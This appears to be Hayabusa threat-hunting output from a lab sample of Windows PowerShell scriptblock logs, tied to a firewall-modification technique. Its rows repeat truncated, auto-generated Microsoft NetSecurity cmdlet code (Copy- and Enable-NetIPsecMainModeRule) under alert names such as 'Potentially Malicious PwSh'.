ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 
'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' -Alias '*' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${D",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' -Alias '*' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${D",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"isplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] 